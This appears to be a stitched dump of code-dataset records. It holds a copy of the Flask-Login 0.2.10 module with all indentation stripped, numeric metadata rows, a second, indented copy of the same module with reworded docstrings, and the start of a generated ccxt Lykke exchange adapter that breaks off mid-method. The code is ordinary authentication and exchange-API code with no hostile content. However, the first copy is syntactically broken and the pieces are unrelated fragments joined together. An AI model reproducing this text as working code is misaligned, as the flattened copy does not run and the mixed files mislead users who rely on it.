secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
# prepare data
if self.token_callback:
data = current_user.get_auth_token()
else:
data = encode_cookie(str(session['user_id']))
expires = datetime.utcnow() + duration
# actually set it
response.set_cookie(cookie_name,
value=data,
expires=expires,
domain=domain,
secure=secure,
httponly=httponly)
def _clear_cookie(self, response):
config = current_app.config
cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
domain = config.get('REMEMBER_COOKIE_DOMAIN')
response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
'''
This provides default implementations for the methods that Flask-Login
expects user objects to have.
'''
def is_active(self):
return True
def is_authenticated(self):
return True
def is_anonymous(self):
return False
def get_id(self):
try:
return unicode(self.id)
except AttributeError:
raise NotImplementedError('No `id` attribute - override `get_id`')
def __eq__(self, other):
'''
Checks the equality of two `UserMixin` objects using `get_id`.
'''
if isinstance(other, UserMixin):
return self.get_id() == other.get_id()
return NotImplemented
def __ne__(self, other):
'''
Checks the inequality of two `UserMixin` objects using `get_id`.
'''
equal = self.__eq__(other)
if equal is NotImplemented:
return NotImplemented
return not equal
if sys.version_info[0] != 2: # pragma: no cover
# Python 3 implicitly set __hash__ to None if we override __eq__
# We set it back to its default implementation
__hash__ = object.__hash__
class AnonymousUserMixin(object):
'''
This is the default object for representing an anonymous user.
'''
def is_authenticated(self):
return False
def is_active(self):
return False
def is_anonymous(self):
return True
def get_id(self):
return
def encode_cookie(payload):
'''
This will encode a ``unicode`` value into a cookie, and sign that cookie
with the app's secret key.
:param payload: The value to encode, as `unicode`.
:type payload: unicode
'''
return u'{0}|{1}'.format(payload, _cookie_digest(payload))
def decode_cookie(cookie):
'''
This decodes a cookie given by `encode_cookie`. If verification of the
cookie fails, ``None`` will be implicitly returned.
:param cookie: An encoded cookie.
:type cookie: str
'''
try:
payload, digest = cookie.rsplit(u'|', 1)
if hasattr(digest, 'decode'):
digest = digest.decode('ascii') # pragma: no cover
except ValueError:
return
if safe_str_cmp(_cookie_digest(payload), digest):
return payload
def make_next_param(login_url, current_url):
'''
Reduces the scheme and host from a given URL so it can be passed to
the given `login` URL more efficiently.
:param login_url: The login URL being redirected to.
:type login_url: str
:param current_url: The URL to reduce.
:type current_url: str
'''
l = urlparse(login_url)
c = urlparse(current_url)
if (not l.scheme or l.scheme == c.scheme) and \
(not l.netloc or l.netloc == c.netloc):
return urlunparse(('', '', c.path, c.params, c.query, ''))
return current_url
def login_url(login_view, next_url=None, next_field='next'):
'''
Creates a URL for redirecting to a login page. If only `login_view` is
provided, this will just return the URL for it. If `next_url` is provided,
however, this will append a ``next=URL`` parameter to the query string
so that the login view can redirect back to that URL.
:param login_view: The name of the login view. (Alternately, the actual
URL to the login view.)
:type login_view: str
:param next_url: The URL to give the login view for redirection.
:type next_url: str
:param next_field: What field to store the next URL in. (It defaults to
``next``.)
:type next_field: str
'''
if login_view.startswith(('https://', 'http://', '/')):
base = login_view
else:
base = url_for(login_view)
if next_url is None:
return base
parts = list(urlparse(base))
md = url_decode(parts[4])
md[next_field] = make_next_param(base, next_url)
parts[4] = url_encode(md, sort=True)
return urlunparse(parts)
def make_secure_token(*args, **options):
'''
This will create a secure token that you can use as an authentication
token for your users. It uses heavy-duty HMAC encryption to prevent people
from guessing the information. (To make it even more effective, if you
will never need to regenerate the token, you can pass some random data
as one of the arguments.)
:param \*args: The data to include in the token.
:type args: args
:param \*\*options: To manually specify a secret key, pass ``key=THE_KEY``.
Otherwise, the ``current_app`` secret key will be used.
:type \*\*options: kwargs
'''
key = options.get('key')
key = _secret_key(key)
l = [s if isinstance(s, bytes) else s.encode('utf-8') for s in args]
payload = b'\0'.join(l)
token_value = hmac.new(key, payload, sha1).hexdigest()
if hasattr(token_value, 'decode'): # pragma: no cover
token_value = token_value.decode('utf-8') # ensure bytes
return token_value
def login_fresh():
'''
This returns ``True`` if the current login is fresh.
'''
return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
'''
Logs a user in. You should pass the actual user object to this. If the
user's `is_active` method returns ``False``, they will not be logged in
unless `force` is ``True``.
This will return ``True`` if the log in attempt succeeds, and ``False`` if
it fails (i.e. because the user is inactive).
:param user: The user object to log in.
:type user: object
:param remember: Whether to remember the user after their session expires.
Defaults to ``False``.
:type remember: bool
:param force: If the user is inactive, setting this to ``True`` will log
them in regardless. Defaults to ``False``.
:type force: bool
'''
if not force and not user.is_active():
return False
user_id = getattr(user, current_app.login_manager.id_attribute)()
session['user_id'] = user_id
session['_fresh'] = True
session['_id'] = _create_identifier()
if remember:
session['remember'] = 'set'
_request_ctx_stack.top.user = user
user_logged_in.send(current_app._get_current_object(), user=_get_user())
return True
def logout_user():
'''
Logs a user out. (You do not need to pass the actual user.) This will
also clean up the remember me cookie if it exists.
'''
if 'user_id' in session:
session.pop('user_id')
if '_fresh' in session:
session.pop('_fresh')
cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
if cookie_name in request.cookies:
session['remember'] = 'clear'
user = _get_user()
if user and not user.is_anonymous():
user_logged_out.send(current_app._get_current_object(), user=user)
current_app.login_manager.reload_user()
return True
def confirm_login():
'''
This sets the current session as fresh. Sessions become stale when they
are reloaded from a cookie.
'''
session['_fresh'] = True
session['_id'] = _create_identifier()
user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
'''
If you decorate a view with this, it will ensure that the current user is
logged in and authenticated before calling the actual view. (If they are
not, it calls the :attr:`LoginManager.unauthorized` callback.) For
example::
@app.route('/post')
@login_required
def post():
pass
If there are only certain times you need to require that your user is
logged in, you can do so with::
if not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
...which is essentially the code that this function adds to your views.
It can be convenient to globally turn off authentication when unit
testing. To enable this, if either of the application
configuration variables `LOGIN_DISABLED` or `TESTING` is set to
`True`, this decorator will be ignored.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
return func(*args, **kwargs)
return decorated_view
def fresh_login_required(func):
'''
If you decorate a view with this, it will ensure that the current user's
login is fresh - i.e. there session was not restored from a 'remember me'
cookie. Sensitive operations, like changing a password or e-mail, should
be protected with this, to impede the efforts of cookie thieves.
If the user is not authenticated, :meth:`LoginManager.unauthorized` is
called as normal. If they are authenticated, but their session is not
fresh, it will call :meth:`LoginManager.needs_refresh` instead. (In that
case, you will need to provide a :attr:`LoginManager.refresh_view`.)
Behaves identically to the :func:`login_required` decorator with respect
to configutation variables.
:param func: The view function to decorate.
:type func: function
'''
@wraps(func)
def decorated_view(*args, **kwargs):
if current_app.login_manager._login_disabled:
return func(*args, **kwargs)
elif not current_user.is_authenticated():
return current_app.login_manager.unauthorized()
elif not login_fresh():
return current_app.login_manager.needs_refresh()
return func(*args, **kwargs)
return decorated_view
def _get_user():
if has_request_context() and not hasattr(_request_ctx_stack.top, 'user'):
current_app.login_manager._load_user()
return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
key = _secret_key(key)
return hmac.new(key, payload.encode('utf-8'), sha1).hexdigest()
def _get_remote_addr():
address = request.headers.get('X-Forwarded-For', request.remote_addr)
if address is not None:
address = address.encode('utf-8')
return address
def _create_identifier():
user_agent = request.headers.get('User-Agent')
if user_agent is not None:
user_agent = user_agent.encode('utf-8')
base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
if str is bytes:
base = unicode(base, 'utf-8', errors='replace') # pragma: no cover
h = md5()
h.update(base.encode('utf8'))
return h.hexdigest()
def _user_context_processor():
return dict(current_user=_get_user())
def _secret_key(key=None):
if key is None:
key = current_app.config['SECRET_KEY']
if isinstance(key, unicode): # pragma: no cover
key = key.encode('latin1') # ensure bytes
return key
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the #: sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
#: called for a normal login.)
#: It receives no additional arguments besides the app.
user_login_confirmed = _signals.signal('login-confirmed')
#: Sent when the `unauthorized` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_unauthorized = _signals.signal('unauthorized')
#: Sent when the `needs_refresh` method is called on a `LoginManager`. It
#: receives no additional arguments besides the app.
user_needs_refresh = _signals.signal('needs-refresh')
#: Sent whenever the user is accessed/loaded
#: receives no additional arguments besides the app.
user_accessed = _signals.signal('accessed')
#: Sent whenever session protection takes effect, and a session is either
#: marked non-fresh or deleted. It receives no additional arguments besides
#: the app.
session_protected = _signals.signal('session-protected')
| 34.902384
| 79
| 0.652769
|
__version_info__ = ('0', '2', '10')
__version__ = '.'.join(__version_info__)
__author__ = 'Matthew Frazier'
__license__ = 'MIT/X11'
__copyright__ = '(c) 2011 by Matthew Frazier'
__all__ = ['LoginManager']
from flask import (_request_ctx_stack, abort, current_app, flash, redirect,
request, session, url_for, has_request_context)
from flask.signals import Namespace
from werkzeug.local import LocalProxy
from werkzeug.security import safe_str_cmp
from werkzeug.urls import url_decode, url_encode
from datetime import datetime, timedelta
from functools import wraps
from hashlib import sha1, md5
import hmac
import warnings
import sys
if sys.version < '3':
from urlparse import urlparse, urlunparse
else:
from urllib.parse import urlparse, urlunparse
unicode = str
_signals = Namespace()
current_user = LocalProxy(lambda: _get_user())
COOKIE_NAME = 'remember_token'
COOKIE_DURATION = timedelta(days=365)
COOKIE_SECURE = None
COOKIE_HTTPONLY = False
LOGIN_MESSAGE = u'Please log in to access this page.'
LOGIN_MESSAGE_CATEGORY = 'message'
REFRESH_MESSAGE = u'Please reauthenticate to access this page.'
REFRESH_MESSAGE_CATEGORY = 'message'
ID_ATTRIBUTE = 'get_id'
AUTH_HEADER_NAME = 'Authorization'
class LoginManager(object):
    """Holds the settings used for logging in and wires Flask-Login's
    request hooks into a Flask application.

    An instance stores configuration (login view, flash messages,
    session-protection mode) plus the callbacks used to reload a user
    from the session, a remember cookie, an authorization header, or
    the raw request.
    """

    def __init__(self, app=None, add_context_processor=True):
        """Set defaults and, when *app* is given, bind to it immediately.

        :param app: optional Flask application to initialize now.
        :param add_context_processor: expose ``current_user`` to
            templates via a context processor.
        """
        #: Class used to produce the user object when nobody is logged in.
        self.anonymous_user = AnonymousUserMixin
        #: Name of (or URL for) the view to redirect to for login.
        self.login_view = None
        #: Message flashed when redirecting to the login view.
        self.login_message = LOGIN_MESSAGE
        self.login_message_category = LOGIN_MESSAGE_CATEGORY
        #: View to redirect to when the user must reauthenticate.
        self.refresh_view = None
        #: Message flashed when redirecting to the 'needs
        #: refresh' page.
        self.needs_refresh_message = REFRESH_MESSAGE
        self.needs_refresh_message_category = REFRESH_MESSAGE_CATEGORY
        #: Session-protection mode: None, 'basic' or 'strong'.
        self.session_protection = 'basic'
        #: Optional translation hook applied to flashed messages.
        self.localize_callback = None
        # Callbacks registered via the *_loader / *_handler decorators below.
        self.token_callback = None
        self.user_callback = None
        self.unauthorized_callback = None
        self.needs_refresh_callback = None
        self.id_attribute = ID_ATTRIBUTE
        self.header_callback = None
        self.request_callback = None
        if app is not None:
            self.init_app(app, add_context_processor)

    def setup_app(self, app, add_context_processor=True):
        """Deprecated alias for :meth:`init_app`."""
        warnings.warn('Warning setup_app is deprecated. Please use init_app.',
                      DeprecationWarning)
        self.init_app(app, add_context_processor)

    def init_app(self, app, add_context_processor=True):
        """Configure *app* to use this login manager."""
        app.login_manager = self
        # Hook that sets/clears the remember cookie on every response.
        app.after_request(self._update_remember_cookie)
        # Login enforcement is skipped when LOGIN_DISABLED (or TESTING) is set.
        self._login_disabled = app.config.get('LOGIN_DISABLED',
                                              app.config.get('TESTING', False))
        if add_context_processor:
            app.context_processor(_user_context_processor)

    def unauthorized(self):
        """Handle an unauthorized access attempt.

        Fires `user_unauthorized`, then runs the registered callback if
        any; otherwise aborts with 401 when no login view is configured,
        or flashes `login_message` and redirects to the login view.
        """
        user_unauthorized.send(current_app._get_current_object())
        if self.unauthorized_callback:
            return self.unauthorized_callback()
        if not self.login_view:
            abort(401)
        if self.login_message:
            if self.localize_callback is not None:
                flash(self.localize_callback(self.login_message),
                      category=self.login_message_category)
            else:
                flash(self.login_message, category=self.login_message_category)
        return redirect(login_url(self.login_view, request.url))

    def user_loader(self, callback):
        """Register the callback that reloads a user from a session user id."""
        self.user_callback = callback
        return callback

    def header_loader(self, callback):
        """Register the callback that loads a user from a request header."""
        self.header_callback = callback
        return callback

    def request_loader(self, callback):
        """Register the callback that loads a user from the raw request."""
        self.request_callback = callback
        return callback

    def token_loader(self, callback):
        """Register the callback that loads a user from an auth token."""
        self.token_callback = callback
        return callback

    def unauthorized_handler(self, callback):
        """Register the callback invoked by :meth:`unauthorized`."""
        self.unauthorized_callback = callback
        return callback

    def needs_refresh_handler(self, callback):
        """Register the callback invoked by :meth:`needs_refresh`."""
        self.needs_refresh_callback = callback
        return callback

    def needs_refresh(self):
        """Handle a request that requires a fresh login.

        Mirrors :meth:`unauthorized` but uses the refresh view/message
        and aborts with 403 when no refresh view is configured.
        """
        user_needs_refresh.send(current_app._get_current_object())
        if self.needs_refresh_callback:
            return self.needs_refresh_callback()
        if not self.refresh_view:
            abort(403)
        if self.localize_callback is not None:
            flash(self.localize_callback(self.needs_refresh_message),
                  category=self.needs_refresh_message_category)
        else:
            flash(self.needs_refresh_message,
                  category=self.needs_refresh_message_category)
        return redirect(login_url(self.refresh_view, request.url))

    def reload_user(self, user=None):
        """Store *user* (or the user matching the session's ``user_id``)
        on the request context, falling back to an anonymous user."""
        ctx = _request_ctx_stack.top
        if user is None:
            user_id = session.get('user_id')
            if user_id is None:
                ctx.user = self.anonymous_user()
            else:
                user = self.user_callback(user_id)
                if user is None:
                    # Session id no longer maps to a user: drop the login.
                    logout_user()
                else:
                    ctx.user = user
        else:
            ctx.user = user

    def _load_user(self):
        """Load the current user, applying session protection first, then
        trying the session, remember cookie, auth header, and raw request
        in that order."""
        user_accessed.send(current_app._get_current_object())
        config = current_app.config
        if config.get('SESSION_PROTECTION', self.session_protection):
            deleted = self._session_protection()
            if deleted:
                # Session was cleared; reload as anonymous.
                return self.reload_user()
        is_missing_user_id = 'user_id' not in session
        if is_missing_user_id:
            cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
            header_name = config.get('AUTH_HEADER_NAME', AUTH_HEADER_NAME)
            has_cookie = (cookie_name in request.cookies and
                          session.get('remember') != 'clear')
            if has_cookie:
                return self._load_from_cookie(request.cookies[cookie_name])
            elif header_name in request.headers:
                return self._load_from_header(request.headers[header_name])
            else:
                return self._load_from_request(request)
        return self.reload_user()

    def _session_protection(self):
        """Compare the stored client identifier against the current one,
        degrading ('basic') or clearing ('strong') the session on mismatch.

        :return: True when the session was cleared and the caller must
            reload the user; False otherwise.
        """
        sess = session._get_current_object()
        ident = _create_identifier()
        app = current_app._get_current_object()
        mode = app.config.get('SESSION_PROTECTION', self.session_protection)
        if '_id' not in sess:
            sess['_id'] = ident
        # An empty session means an anonymous / just-logged-out user,
        # so we can skip this, unless 'strong' protection is active,
        # in which case we need to double check for the remember me token
        check_protection = sess or mode == 'strong'
        if check_protection and ident != sess.get('_id', None):
            if mode == 'basic' or sess.permanent:
                # Downgrade to a non-fresh login instead of logging out.
                sess['_fresh'] = False
                session_protected.send(app)
                return False
            elif mode == 'strong':
                sess.clear()
                sess['remember'] = 'clear'
                session_protected.send(app)
                return True
        return False

    def _load_from_cookie(self, cookie):
        """Reload the user from a remember cookie, preferring the token
        callback when registered, else the signed cookie payload."""
        if self.token_callback:
            user = self.token_callback(cookie)
            if user is not None:
                session['user_id'] = getattr(user, self.id_attribute)()
                session['_fresh'] = False  # cookie logins are never fresh
                _request_ctx_stack.top.user = user
            else:
                self.reload_user()
        else:
            user_id = decode_cookie(cookie)
            if user_id is not None:
                session['user_id'] = user_id
                session['_fresh'] = False
            self.reload_user()
        if _request_ctx_stack.top.user is not None:
            app = current_app._get_current_object()
            user_loaded_from_cookie.send(app, user=_get_user())

    def _load_from_header(self, header):
        """Reload the user from an authorization-header value."""
        user = None
        if self.header_callback:
            user = self.header_callback(header)
        if user is not None:
            self.reload_user(user=user)
            app = current_app._get_current_object()
            user_loaded_from_header.send(app, user=_get_user())
        else:
            self.reload_user()

    def _load_from_request(self, request):
        """Reload the user from the request object itself."""
        user = None
        if self.request_callback:
            user = self.request_callback(request)
        if user is not None:
            self.reload_user(user=user)
            app = current_app._get_current_object()
            user_loaded_from_request.send(app, user=_get_user())
        else:
            self.reload_user()

    def _update_remember_cookie(self, response):
        """after_request hook: honor session['remember'] ('set'/'clear')
        by updating the remember cookie on *response*."""
        # Don't modify the session unless there's something to do.
        if 'remember' in session:
            operation = session.pop('remember', None)
            if operation == 'set' and 'user_id' in session:
                self._set_cookie(response)
            elif operation == 'clear':
                self._clear_cookie(response)
        return response

    def _set_cookie(self, response):
        """Attach a remember cookie to *response*, using app config
        overrides where present."""
        # cookie settings
        config = current_app.config
        cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
        duration = config.get('REMEMBER_COOKIE_DURATION', COOKIE_DURATION)
        domain = config.get('REMEMBER_COOKIE_DOMAIN')
        secure = config.get('REMEMBER_COOKIE_SECURE', COOKIE_SECURE)
        httponly = config.get('REMEMBER_COOKIE_HTTPONLY', COOKIE_HTTPONLY)
        # prepare data: auth token when a token callback exists, else the
        # HMAC-signed user id
        if self.token_callback:
            data = current_user.get_auth_token()
        else:
            data = encode_cookie(str(session['user_id']))
        expires = datetime.utcnow() + duration
        # actually set it
        response.set_cookie(cookie_name,
                            value=data,
                            expires=expires,
                            domain=domain,
                            secure=secure,
                            httponly=httponly)

    def _clear_cookie(self, response):
        """Delete the remember cookie on *response*."""
        config = current_app.config
        cookie_name = config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
        domain = config.get('REMEMBER_COOKIE_DOMAIN')
        response.delete_cookie(cookie_name, domain=domain)
class UserMixin(object):
    """Default implementations for the methods Flask-Login expects user
    objects to provide."""

    def is_active(self):
        """By default every user account counts as active."""
        return True

    def is_authenticated(self):
        """Instances of this mixin represent authenticated users."""
        return True

    def is_anonymous(self):
        """This mixin never represents an anonymous user."""
        return False

    def get_id(self):
        """Return the user's ``id`` attribute as a unicode string."""
        try:
            return unicode(self.id)
        except AttributeError:
            raise NotImplementedError('No `id` attribute - override `get_id`')

    def __eq__(self, other):
        """Users compare equal when their IDs match."""
        if not isinstance(other, UserMixin):
            return NotImplemented
        return self.get_id() == other.get_id()

    def __ne__(self, other):
        """Inverse of ``__eq__``, propagating ``NotImplemented``."""
        outcome = self.__eq__(other)
        return outcome if outcome is NotImplemented else not outcome

    if sys.version_info[0] != 2:  # pragma: no cover
        # Overriding __eq__ implicitly sets __hash__ to None on Python 3;
        # restore the default identity-based hash.
        __hash__ = object.__hash__
class AnonymousUserMixin(object):
    """Default object representing an anonymous (not logged-in) user."""

    def is_authenticated(self):
        """An anonymous user is never authenticated."""
        return False

    def is_active(self):
        """An anonymous user is never active."""
        return False

    def is_anonymous(self):
        """Always ``True`` for this class."""
        return True

    def get_id(self):
        """Anonymous users carry no ID."""
        return None
def encode_cookie(payload):
    """Serialize *payload* for the remember cookie as ``payload|digest``."""
    digest = _cookie_digest(payload)
    return u'{0}|{1}'.format(payload, digest)
def decode_cookie(cookie):
    """Validate a remember cookie and return its payload, or ``None``
    when the cookie is malformed or its digest does not match."""
    try:
        payload, digest = cookie.rsplit(u'|', 1)
        # Keep the decode inside the try: UnicodeDecodeError is a
        # subclass of ValueError and must also yield None.
        if hasattr(digest, 'decode'):
            digest = digest.decode('ascii')  # pragma: no cover
    except ValueError:
        return None
    if not safe_str_cmp(_cookie_digest(payload), digest):
        return None
    return payload
def make_next_param(login_url, current_url):
    """Reduce *current_url* to a host-relative URL when it shares scheme
    and netloc with *login_url*; otherwise return it unchanged."""
    login_parts = urlparse(login_url)
    current_parts = urlparse(current_url)
    same_scheme = not login_parts.scheme or login_parts.scheme == current_parts.scheme
    same_host = not login_parts.netloc or login_parts.netloc == current_parts.netloc
    if same_scheme and same_host:
        return urlunparse(('', '', current_parts.path,
                           current_parts.params, current_parts.query, ''))
    return current_url
def login_url(login_view, next_url=None, next_field='next'):
    """Build a URL for the login view, optionally embedding *next_url*
    as the *next_field* query parameter."""
    if login_view.startswith(('https://', 'http://', '/')):
        base = login_view
    else:
        # Treat login_view as an endpoint name.
        base = url_for(login_view)
    if next_url is None:
        return base
    parts = list(urlparse(base))
    query = url_decode(parts[4])
    query[next_field] = make_next_param(base, next_url)
    parts[4] = url_encode(query, sort=True)
    return urlunparse(parts)
def make_secure_token(*args, **options):
    """Create a deterministic HMAC-SHA1 hex token from the arguments.

    A signing key may be supplied via ``key=``; otherwise the key is
    resolved through ``_secret_key``.
    """
    key = _secret_key(options.get('key'))
    encoded = [piece if isinstance(piece, bytes) else piece.encode('utf-8')
               for piece in args]
    token = hmac.new(key, b'\0'.join(encoded), sha1).hexdigest()
    if hasattr(token, 'decode'):  # pragma: no cover
        token = token.decode('utf-8')  # ensure text, not bytes
    return token
def login_fresh():
    """Return the session's ``_fresh`` flag (True only when the login
    came from an actual credential entry, not a remember cookie)."""
    return session.get('_fresh', False)
def login_user(user, remember=False, force=False):
    """Log *user* in and record them in the session.

    :param user: the user object to log in.
    :param remember: when True, request a remember cookie to be written
        on the response (handled by ``LoginManager._update_remember_cookie``).
    :param force: log the user in even when ``is_active()`` is False.
    :return: True on success; False when the user is inactive and
        *force* is not set.
    """
    if not force and not user.is_active():
        return False
    user_id = getattr(user, current_app.login_manager.id_attribute)()
    session['user_id'] = user_id
    session['_fresh'] = True  # a direct login is always fresh
    session['_id'] = _create_identifier()
    if remember:
        session['remember'] = 'set'
    _request_ctx_stack.top.user = user
    user_logged_in.send(current_app._get_current_object(), user=_get_user())
    return True
def logout_user():
    """Log the current user out: drop session keys, request removal of
    the remember cookie, fire the signal, and reload as anonymous."""
    session.pop('user_id', None)
    session.pop('_fresh', None)
    cookie_name = current_app.config.get('REMEMBER_COOKIE_NAME', COOKIE_NAME)
    if cookie_name in request.cookies:
        # Ask the after_request hook to delete the remember cookie.
        session['remember'] = 'clear'
    user = _get_user()
    if user and not user.is_anonymous():
        user_logged_out.send(current_app._get_current_object(), user=user)
    current_app.login_manager.reload_user()
    return True
def confirm_login():
    """Mark the current session as fresh again after reauthentication
    and fire the ``user_login_confirmed`` signal."""
    session['_fresh'] = True
    session['_id'] = _create_identifier()
    user_login_confirmed.send(current_app._get_current_object())
def login_required(func):
    """View decorator that sends unauthenticated users through the login
    manager's ``unauthorized`` handling (no-op when login is disabled)."""
    @wraps(func)
    def decorated_view(*args, **kwargs):
        manager = current_app.login_manager
        if not manager._login_disabled and not current_user.is_authenticated():
            return manager.unauthorized()
        return func(*args, **kwargs)
    return decorated_view
def fresh_login_required(func):
    """View decorator requiring a *fresh* login: unauthenticated users go
    to ``unauthorized``, stale logins to ``needs_refresh``."""
    @wraps(func)
    def decorated_view(*args, **kwargs):
        manager = current_app.login_manager
        if manager._login_disabled:
            return func(*args, **kwargs)
        if not current_user.is_authenticated():
            return manager.unauthorized()
        if not login_fresh():
            return manager.needs_refresh()
        return func(*args, **kwargs)
    return decorated_view
def _get_user():
    """Return the user bound to the current request context, loading it
    lazily on first access; ``None`` outside a request context."""
    ctx = _request_ctx_stack.top
    if has_request_context() and not hasattr(ctx, 'user'):
        current_app.login_manager._load_user()
    return getattr(_request_ctx_stack.top, 'user', None)
def _cookie_digest(payload, key=None):
    """Return the HMAC-SHA1 hex digest of *payload* under the signing key."""
    mac = hmac.new(_secret_key(key), payload.encode('utf-8'), sha1)
    return mac.hexdigest()
def _get_remote_addr():
    """Return the client address (preferring X-Forwarded-For) as bytes,
    or ``None`` when no address is available."""
    address = request.headers.get('X-Forwarded-For', request.remote_addr)
    return address.encode('utf-8') if address is not None else None
def _create_identifier():
    """Derive the session-protection identifier (an MD5 hex digest) from
    the client address and User-Agent header."""
    user_agent = request.headers.get('User-Agent')
    if user_agent is not None:
        user_agent = user_agent.encode('utf-8')
    base = '{0}|{1}'.format(_get_remote_addr(), user_agent)
    if str is bytes:
        # Python 2: normalise to unicode before hashing.
        base = unicode(base, 'utf-8', errors='replace')  # pragma: no cover
    return md5(base.encode('utf8')).hexdigest()
def _user_context_processor():
    """Template context processor exposing ``current_user``."""
    return {'current_user': _get_user()}
def _secret_key(key=None):
    """Return the signing key as bytes, defaulting to the application's
    ``SECRET_KEY`` configuration value."""
    resolved = key if key is not None else current_app.config['SECRET_KEY']
    if isinstance(resolved, unicode):  # pragma: no cover
        # HMAC needs bytes; latin1 keeps arbitrary code points 0-255 intact.
        resolved = resolved.encode('latin1')
    return resolved
# Signals
#: Sent when a user is logged in. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged in.
user_logged_in = _signals.signal('logged-in')
#: Sent when a user is logged out. In addition to the app (which is the
#: sender), it is passed `user`, which is the user being logged out.
user_logged_out = _signals.signal('logged-out')
#: Sent when the user is loaded from the cookie. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_cookie = _signals.signal('loaded-from-cookie')
#: Sent when the user is loaded from the header. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_header = _signals.signal('loaded-from-header')
#: Sent when the user is loaded from the request. In addition to the app (which
#: is the sender), it is passed `user`, which is the user being reloaded.
user_loaded_from_request = _signals.signal('loaded-from-request')
#: Sent when a user's login is confirmed, marking it as fresh. (It is not
#: sent for a normal login.)
user_login_confirmed = _signals.signal('login-confirmed')
#: Sent when `unauthorized` is called on a `LoginManager`.
user_unauthorized = _signals.signal('unauthorized')
#: Sent when `needs_refresh` is called on a `LoginManager`.
user_needs_refresh = _signals.signal('needs-refresh')
#: Sent when the user is accessed during request handling.
user_accessed = _signals.signal('accessed')
#: Sent when session protection takes effect.
session_protected = _signals.signal('session-protected')
| true
| true
|
f7051d918dd37949e61a5f9a742e216e26e774b9
| 12,368
|
py
|
Python
|
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | 1
|
2019-03-12T09:30:24.000Z
|
2019-03-12T09:30:24.000Z
|
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | null | null | null |
python/ccxt/lykke.py
|
mikepsinn/ccxt
|
04c73735f53a7f28f5f4bd7f6846503047297138
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:
# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code
from ccxt.base.exchange import Exchange
import math
class lykke (Exchange):
    """ccxt adapter for the Lykke exchange (generated file: code must not
    be hand-edited upstream; only comments are added here)."""

    def describe(self):
        """Return the static exchange description (endpoints, capabilities,
        fees) merged over the base Exchange description."""
        return self.deep_extend(super(lykke, self).describe(), {
            'id': 'lykke',
            'name': 'Lykke',
            'countries': 'CH',
            'version': 'v1',
            'rateLimit': 200,
            'has': {
                'CORS': False,
                'fetchOHLCV': False,
                'fetchTrades': False,
                'fetchOpenOrders': True,
                'fetchClosedOrders': True,
                'fetchOrders': True,
            },
            'requiredCredentials': {
                'apiKey': True,
                'secret': False,
            },
            'urls': {
                'logo': 'https://user-images.githubusercontent.com/1294454/34487620-3139a7b0-efe6-11e7-90f5-e520cef74451.jpg',
                'api': {
                    'mobile': 'https://api.lykkex.com/api',
                    'public': 'https://hft-api.lykke.com/api',
                    'private': 'https://hft-api.lykke.com/api',
                    'test': {
                        'mobile': 'https://api.lykkex.com/api',
                        'public': 'https://hft-service-dev.lykkex.net/api',
                        'private': 'https://hft-service-dev.lykkex.net/api',
                    },
                },
                'www': 'https://www.lykke.com',
                'doc': [
                    'https://hft-api.lykke.com/swagger/ui/',
                    'https://www.lykke.com/lykke_api',
                ],
                'fees': 'https://www.lykke.com/trading-conditions',
            },
            'api': {
                'mobile': {
                    'get': [
                        'AllAssetPairRates/{market}',
                    ],
                },
                'public': {
                    'get': [
                        'AssetPairs',
                        'AssetPairs/{id}',
                        'IsAlive',
                        'OrderBooks',
                        'OrderBooks/{AssetPairId}',
                    ],
                },
                'private': {
                    'get': [
                        'Orders',
                        'Orders/{id}',
                        'Wallets',
                    ],
                    'post': [
                        'Orders/limit',
                        'Orders/market',
                        'Orders/{id}/Cancel',
                    ],
                },
            },
            'fees': {
                'trading': {
                    'tierBased': False,
                    'percentage': True,
                    'maker': 0.0,  # as of 7 Feb 2018, see https://github.com/ccxt/ccxt/issues/1863
                    'taker': 0.0,  # https://www.lykke.com/cp/wallet-fees-and-limits
                },
                'funding': {
                    'tierBased': False,
                    'percentage': False,
                    'withdraw': {
                        'BTC': 0.001,
                    },
                    'deposit': {
                        'BTC': 0,
                    },
                },
            },
        })

    def fetch_balance(self, params={}):
